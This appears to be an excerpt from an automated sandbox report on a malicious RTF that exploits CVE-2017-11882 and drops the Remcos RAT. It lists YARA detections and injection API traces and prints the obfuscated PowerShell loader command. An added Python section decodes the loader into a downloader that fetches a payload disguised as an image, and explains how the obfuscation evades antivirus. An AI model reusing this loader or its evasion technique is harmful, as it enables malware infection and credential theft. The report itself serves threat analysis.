                  Source: Yara match	File source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match	File source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match	File source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPE
                  Source: Yara match	File source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match	File source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match	File source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR
                  Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4008, type: MEMORYSTR

                  E-Banking Fraud

                  Source: Yara match	File source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match	File source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match	File source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPE
                  Source: Yara match	File source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match	File source: 00000008.00000002.875009514.0000000000539000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match	File source: 00000008.00000002.875009514.0000000000521000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match	File source: 00000008.00000002.875009514.0000000000505000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match	File source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match	File source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR
                  Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4008, type: MEMORYSTR

                  System Summary

                  Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf, type: SAMPLE	Matched rule: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. Author: ditekSHen
                  Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 3800, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR	Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                  Source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: RegAsm.exe PID: 4008, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 9122
                  Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? 
? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ?
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? 
? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ?Jump to behavior
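The `$Codigo` value in the command line above is base64 of UTF-16LE text in which every `A` has been swapped for a marker string (rendered in this report as the recurring `? ? ? ? ?` run). In base64 of UTF-16LE ASCII every second byte is 0x00, which makes `A` by far the most frequent symbol, so removing it defeats naive base64 carving and most AV base64 signatures. The part of the command line that turns the marker back into `A` is cut off in the report. The following Python is an added example, not part of the Joe Sandbox output or of the sample: it infers the marker as the shortest run of non-base64 characters, substitutes `A` for each copy, and decodes the excerpt that is visible above. That the marker stands for `A` is this example's assumption; the test below confirms it by decoding to valid PowerShell.

```python
import base64
import re

# Anything outside the base64 alphabet is part of the marker.
NOT_B64 = re.compile(r"[^A-Za-z0-9+/=]+")

# Excerpt of the obfuscated $Codigo value, copied from the wscript.exe ->
# powershell.exe command line in this report (the first 50 base64 groups only;
# the full value is far longer). The "? ? ? ? ?" run is the marker as the
# report renders it; whatever the real characters are, they are not base64.
CODIGO_EXCERPT = (
    "J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?"
    "I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?"
    "Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?"
    "ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?"
    "bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?"
    "XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?"
    "ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?"
    "LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?"
)


def recover_base64(obfuscated: str) -> str:
    """Turn the marker-obfuscated blob back into base64.

    Assumption (the sample's own .replace() call is not visible in the
    truncated command line): every run of non-base64 characters is one or
    more back-to-back copies of a single marker, and each copy stands for
    one 'A'. The marker is taken to be the shortest run, so the input must
    contain at least one single occurrence (any real blob does).
    """
    runs = NOT_B64.findall(obfuscated)
    if not runs:
        return obfuscated
    marker = min(runs, key=len)

    def one_run(m: re.Match) -> str:
        run = m.group(0)
        count, rem = divmod(len(run), len(marker))
        if rem or run != marker * count:
            raise ValueError(f"run is not a repetition of the marker: {run!r}")
        return "A" * count

    return NOT_B64.sub(one_run, obfuscated)


def deobfuscate_codigo(obfuscated: str) -> str:
    """Recover the PowerShell text: marker -> base64 -> bytes -> UTF-16LE."""
    b64 = recover_base64(obfuscated)
    b64 += "=" * (-len(b64) % 4)           # tolerate a truncated excerpt
    raw = base64.b64decode(b64)
    if len(raw) % 2:
        raw = raw[:-1]                       # drop a dangling half code unit
    return raw.decode("utf-16-le", errors="replace")


def extract_urls(script: str) -> list:
    """Pull network indicators out of the decoded script."""
    return re.findall(r"https?://[^\s'\";]+", script)


if __name__ == "__main__":
    decoded = deobfuscate_codigo(CODIGO_EXCERPT)
    print(decoded)
    print("URLs:", extract_urls(decoded))
```

Run as a script it prints the recovered prefix, `$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';`: the first PowerShell stage is a downloader that fetches a file served as an image from archive.org, and that URL is the indicator to hunt for in proxy logs. Only this prefix can be recovered from the page because the rest of `$Codigo` is cut off in the report.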
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00401806 NtdllDefWindowProc_W
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004018C0 NtdllDefWindowProc_W
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_004016FD NtdllDefWindowProc_A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_004017B7 NtdllDefWindowProc_A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00402CAC NtdllDefWindowProc_A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00402D66 NtdllDefWindowProc_A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00256240
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00252475
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0043706A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00414005
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0043E11C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004541D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004381E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041F18B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00446270
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0043E34B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004533AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0042742E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00437566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0043E5A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004387F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0043797E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004339D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0044DA49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00427AD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041DBF3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00427C40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00437DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00435EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0043DEED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00426E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_10017194
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_1000B5C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0044B040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0043610D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00447310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0044A490
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040755A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0043C560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0044B610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0044D6C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004476F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0044B870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0044081D
